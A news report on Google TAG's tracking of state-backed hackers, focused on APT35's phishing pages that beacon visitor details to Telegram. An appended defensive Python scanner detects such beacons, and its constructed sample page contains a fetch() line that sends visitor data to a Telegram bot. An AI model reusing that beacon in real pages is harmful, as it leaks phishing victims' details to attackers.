The Google Threat Analysis Group (TAG) said that it is tracking more than 270 government-backed hacker groups from over 50 countries, involved in disinformation campaigns, cyber-espionage, or financially motivated cybercrime.
In a new blog post, TAG’s Ajax Bash revealed that so far in 2021 the team sent over 50,000 warnings of state-sponsored phishing or malware attempts to customers. This marks a 33% increase from the same period in 2020, largely due to blocking “an unusually large campaign” from a Russia-linked threat actor known as APT28 or Fancy Bear.
One of the most notable campaigns disrupted by TAG this year was orchestrated by Iranian threat actor APT35 (aka Charming Kitten, Phosphorous, or Newscaster), known for its phishing attacks targeting high-risk users.
Some previous attacks of the group involved the use of compromised websites to host a phishing kit that allowed them to collect credentials for platforms such as Gmail, Hotmail, and Yahoo, as well as a malicious VPN app uploaded to the Google Play Store that, when installed, could be leveraged to steal sensitive information such as call logs, text messages, contacts, and location data from the infected devices.
The group also adopted a novel technique that uses Telegram for operator notifications.
“The attackers embed javascript into phishing pages that notify them when the page has been loaded. To send the notification, they use the Telegram API sendMessage function, which lets anyone use a Telegram bot to send a message to a public channel. The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram and they have taken action to remove it,” TAG explained.
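As an added defensive example (not code from Google TAG or from this article), the Python scanner below flags the beacon pattern described above in captured phishing-page source or in web-proxy logs, pulling out the numeric bot id and destination chat for an abuse report while masking the token secret. The page content, bot tokens, channel names and log lines are all constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Bot API call shape: https://api.telegram.org/bot<bot_id>:<secret>/sendMessage?...
# Only sendMessage is flagged, the method the TAG write-up names.
SENDMESSAGE_URL = re.compile(
    r"api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/sendMessage"
    r"(\?[^\s'\"<>)]*)?"
)
CHAT_ID = re.compile(r"chat_id=(?P<chat_id>-?\d+|@[A-Za-z0-9_]{5,})")


@dataclass
class Finding:
    source: str               # page URL or log name the hit came from
    bot_id: str               # numeric bot id, safe to quote in an abuse report
    secret_fingerprint: str   # masked secret: enough to correlate, not to reuse
    chat_id: Optional[str]    # destination channel/chat when visible


def scan_text(source: str, text: str) -> list[Finding]:
    """One Finding per Telegram sendMessage beacon in page source or a log line."""
    findings = []
    for m in SENDMESSAGE_URL.finditer(text):
        secret = m.group("secret")
        fingerprint = secret[:4] + "..." + secret[-2:]
        # chat_id is normally in the query string but may sit in a nearby
        # string concatenation or POST body, so search a window around the hit.
        window = text[max(0, m.start() - 300): m.end() + 300]
        c = CHAT_ID.search(window)
        findings.append(Finding(source, m.group("bot_id"), fingerprint,
                                c.group("chat_id") if c else None))
    return findings


# Constructed samples: no real page, token or channel.
PHISHING_PAGE = """<html><body><form>...</form><script>
var u = "https://api.telegram.org/bot123456789:AAE1234567890abcdefghijklmnopqrstuv/sendMessage";
fetch(u + "?chat_id=@c0nstructed_channel&text=" + beacon);
</script></body></html>"""
BENIGN_PAGE = '<a href="https://telegram.org/">Chat with us on Telegram</a>'
PROXY_LOG = [
    "2021-10-14T10:22:03Z 10.0.0.5 GET https://api.telegram.org/bot987654321:AAH"
    + "z" * 32 + "/sendMessage?chat_id=-1001234567890&text=x 200",
    "2021-10-14T10:22:04Z 10.0.0.5 GET https://www.google.com/ 200",
]
```

A page that assembles the hostname at runtime or splits it across concatenations will evade the page-source regex; the proxy-log path still catches it, because by then the request URL is fully formed.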
“For years, this group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government,” Bash said.